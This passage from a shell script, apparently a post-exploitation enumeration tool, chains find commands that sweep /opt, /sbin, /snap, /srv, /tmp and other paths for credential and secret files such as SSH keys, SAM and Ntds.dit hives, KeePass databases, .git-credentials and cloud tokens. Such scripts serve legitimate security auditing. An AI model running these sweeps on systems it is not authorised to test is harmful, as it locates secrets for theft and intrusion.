\"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"agent*\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name 